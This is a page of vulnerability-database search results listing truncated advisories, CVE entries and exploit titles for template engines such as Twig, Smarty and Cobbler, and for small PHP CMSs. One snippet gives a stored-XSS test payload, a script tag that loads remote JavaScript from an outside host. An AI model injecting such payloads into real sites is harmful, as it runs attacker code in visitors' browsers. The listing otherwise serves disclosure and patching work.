792 matches found
[SECURITY] Fedora 17 Update: php-twig-Twig-1.12.3-1.fc17
The flexible, fast, and secure template engine for PHP. Fast: Twig compiles templates down to plain optimized PHP code. The overhead compared to regular PHP code was reduced to the very minimum. Secure: Twig has a sandbox mode to evaluate untrusted template code. This allows Twig to be used as a...
[SECURITY] Fedora 19 Update: php-twig-Twig-1.12.3-1.fc19
The flexible, fast, and secure template engine for PHP. Fast: Twig compiles templates down to plain optimized PHP code. The overhead compared to regular PHP code was reduced to the very minimum. Secure: Twig has a sandbox mode to evaluate untrusted template code. This allows Twig to be used as a...
Fedora Update for perl-HTML-Template-Pro FEDORA-2012-15482
Check for the Version of perl-HTML-Template-Pro OpenVAS Vulnerability Test Fedora Update for perl-HTML-Template-Pro FEDORA-2012-15482 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute i...
Smarty vulnerable to cross-site scripting
Overview Smarty contains a cross-site scripting vulnerability. Smarty is a template engine for PHP. Smarty contains a cross-site scripting vulnerability when displaying an error message. Yuji Tounai of bogus.jp reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under...
[SECURITY] Fedora 18 Update: perl-HTML-Template-Pro-0.9509-1.fc18
A fast and lightweight C/Perl+XS HTML Template engine implementation...
Gentoo Security Advisory GLSA 201006-13 (smarty)
The remote host is missing updates announced in advisory GLSA 201006-13. OpenVAS Vulnerability Test $ Description: Auto generated from Gentoo's XML based advisory Authors: Thomas Reinke Copyright: Copyright c 2011 E-Soft Inc. http://www.securityspace.com Text descriptions are largely excerpted fr...
Smarty Template Engine 2.6.9 - $smarty.template PHP Code Injection
Smarty Template Engine 2.6.9 - $smarty.template PHP Code Injection source: https://www.securityfocus.com/bid/46366/info Smarty Template Engine is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the...
Weeds Weedcms v4. 0-5. 0 blind injection vulnerability-vulnerability warning-the black bar safety net
Weeds Weedcms v4. 0 sp1 to the latest 5.0 New Year Edition USERAGENT blind injection vulnerability Program description: wild Weedcms based on the PHP+MYSQL schema. Innovative content management mode, the establishment of channels can be defined in the content model, both in the background you can...
CVE-2010-2235
CVE-2010-2235 affects Cobbler: template_api.py used in Cobbler prior to 2.0.7 allows remote authenticated admins to execute arbitrary Python code via a crafted kickstart template, due to the Cheetah template engine not being restricted. This is a code injection issue in the template processing pa...
PT-2010-3833
Name of the Vulnerable Software and Affected Versions Cobbler versions prior to 2.0.7 Description The issue allows remote authenticated administrators to execute arbitrary code via a crafted kickstart template file. This is due to the template api.py file not disabling the ability of the Cheetah...
(cobbler): Code injection flaw (ACE as root) by processing of a specially-crafted kickstart template file
templateapi.py in Cobbler before 2.0.7, as used in Red Hat Network Satellite Server and other products, does not disable the ability of the Cheetah template engine to execute Python statements contained in templates, which allows remote authenticated administrators to execute arbitrary code via a...
1 1 4. Site Navigation Station system of V1. 1 3 XSS cross-site attacks-vulnerability warning-the black bar safety net
url-submit/index. php to submit the data is not filtered directly into the database,resulting in a savings ofXSSvulnerability Test method: In the Site Name column fill in thescript src=http://www. hackqing. cn/qingexp. js/script(src is fill in your own js file for the address,don't tell me that t...
wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting
Title: WB News Webmobo 2.3.3 Stored XSS Vendor: http://www.webmobo.org/ AUTHOR: ITSecTeam Email: [email protected] Website: http://www.itsecteam.com Forum : http://forum.ITSecTeam.com Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability44.htm Thanks: r3dm0v3 r3dm0v3atymail.com,...
DynPG CMS Multiple Remote File Inclusion Vulnerability
fucking the Web Apps attack edition / / / / L /' / , / / /' , / /' /' / /' / / / / / / L / / / // // // ///////////L // ////// // // Hack0wn! Security Project / /&...
DynPG CMS 4.1.0 - popup.php counter.php Multiple Vulnerabilities
DynPG CMS 4.1.0 - popup.php counter.php Multiple Vulnerabilities DynPG CMS v4.1.0 Multiple Vulnerability fucking the Web Apps attack edition /\ \ /\ \ /\ /\ \ \ \ \L\ \ \ /'\ /\ \ \ ,\ \ \ \ \ /\ /\ \ /'\ \ , /\ \ /' \ /' \ \ \ /\ \ \ /'\ \ \ /\ \ \ /\ /\ \ \\ \ /\ /\ /\ \L\ \ \ ...
DynPG CMS 4.1.0 Remote File Inclusion
fucking the Web Apps attack edition /\ \ /\ \ /\ /\ \ \ \ \L\ \ \ /'\ /\ \ \ ,\ \ \ \ \ /\ /\ \ /'\ \ , /\ \ /' \ /' \ \ \ /\ \ \ /'\ \ \ /\ \ \ /\ /\ \ \\ \ /\ /\ /\ \L\ \ \ \ \ \ \ \ /\ / \ \ \ /\ \\ \ \ \ \ \ \ \ \ \\ \ \ \ // // // ///////////L\ \ //...
DynPG CMS v4.1.0 Multiple Vulnerabilities
Exploit for php platform in category web applications ========================================= DynPG CMS v4.1.0 Multiple Vulnerabilities ========================================= +Title : DynPG CMS Multiple Remote File Inclusion Vulnerability +Version: 4.1.0 Other or lower versions may also be...
DynPG CMS 4.1.0 - Multiple Vulnerabilities
DynPG CMS v4.1.0 Multiple Vulnerability fucking the Web Apps attack edition /\ \ /\ \ /\ /\ \ \ \ \L\ \ \ /'\ /\ \ \ ,\ \ \ \ \ /\ /\ \ /'\ \ , /\ \ /' \ /' \ \ \ /\ \ \ /'\ \ \ /\ \ \ /\ /\ \ \\ \ /\ /\ /\ \L\ \ \ \ \ \ \ \ /\ / \ \ \ /\ \\ \ \ \ \ \ \ \ \ \\ \ \ \...
Ray air video and cloud networks interactive all php version system 0day-vulnerability warning-the black bar safety net
Long time no write something, and yesterday a friend let me find the sets of television systems php version, said to a television station, he by the way also sent a set, called the ray of the wind movie, the rough looked under the code, write the Also and secure means, but the thousand Secret a...
Fedora Update for php-Smarty FEDORA-2008-8956
Check for the Version of php-Smarty OpenVAS Vulnerability Test Fedora Update for php-Smarty FEDORA-2008-8956 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under...